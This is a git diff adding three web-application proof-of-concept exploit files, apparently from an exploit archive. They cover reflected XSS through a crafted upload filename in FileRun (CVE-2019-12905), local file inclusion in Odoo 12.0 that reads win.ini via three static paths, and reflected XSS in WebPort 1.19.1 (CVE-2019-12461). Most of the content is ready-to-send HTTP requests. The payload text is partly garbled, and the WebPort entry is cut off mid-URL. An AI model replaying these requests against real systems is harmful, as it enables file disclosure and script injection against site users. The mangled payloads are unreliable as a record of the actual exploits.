diff --git a/exploits/multiple/webapps/48607.txt b/exploits/multiple/webapps/48607.txt
new file mode 100644
index 000000000..4b60ef2d3
--- /dev/null
+++ b/exploits/multiple/webapps/48607.txt
@@ -0,0 +1,62 @@
+# Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting
+# Date: 2019-07-01
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://www.filerun.com/
+# Software Link: https://filerun.com/download
+# Version: v2019.05.21
+# Tested on: Windows/Linux
+# CVE: CVE-2019-12905
+
+# CVE-2019-12905
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905
+# https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3
+
+# PoC
+
+To exploit vulnerability, someone could upload an allowed file named “>
to impact users who open the page.
+
+POST /filerun/?module=fileman§ion=do&page=up HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.191.129/filerun/
+Content-Type: multipart/form-data;
+boundary=---------------------------142096305821079611661465592403
+Content-Length: 6034
+DNT: 1
+Connection: close
+Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5
+
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowTotalSize"
+
+5100
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowIsFirstChunk"
+
+1
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowIsLastChunk"
+
+1
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="flowFilename"
+
+�>
.jpg
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="path"
+
+/ROOT/HOME
+-----------------------------142096305821079611661465592403
+Content-Disposition: form-data; name="file"; filename="�>
.jpg"
+Content-Type: image/jpg
+
+<%@ I said you should learn! %>
+
+
+-----------------------------142096305821079611661465592403--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48609.txt b/exploits/multiple/webapps/48609.txt
new file mode 100644
index 000000000..5ecdf7e72
--- /dev/null
+++ b/exploits/multiple/webapps/48609.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Odoo 12.0 - Local File Inclusion
+# Date: 2019-06-14
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://www.odoo.com/
+# Software Link: https://www.odoo.com/tr_TR/page/download
+# Version: v12.0
+# Tested on: Windows/Linux
+# https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities
+# https://www.odoo.com/security-report
+
+# PoC-1
+To exploit vulnerability, someone could use
+'http://[HOST]:8069/base_import/static/c:/windows/win.ini'
+request to get some information from the target.
+
+GET /base_import/static/c:/windows/win.ini HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+# PoC-2
+To exploit vulnerability, someone could use 'http://[HOST]:8069/
+web/static/c:/windows/win.ini' request to get some information from the
+target.
+
+GET /web/static/c:/windows/win.ini HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+# PoC-3
+To exploit vulnerability, someone could use 'http://[HOST]:8069/
+base/static/c:/windows/win.ini' request to get some information from the
+target.
+
+GET /base/static/c:/windows/win.ini HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48611.txt b/exploits/multiple/webapps/48611.txt
new file mode 100644
index 000000000..5f55df603
--- /dev/null
+++ b/exploits/multiple/webapps/48611.txt
@@ -0,0 +1,30 @@
+# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting
+# Date: 2019-05-30
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://webport.se/
+# Software Link: https://webport.se/nedladdningar/
+# Version: v1.19.1
+# Tested on: Windows/Linux
+# CVE-2019-12461
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
+# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
+
+# PoC
+
+To exploit vulnerability, someone could use 'http://
+[server]:8090/log?type="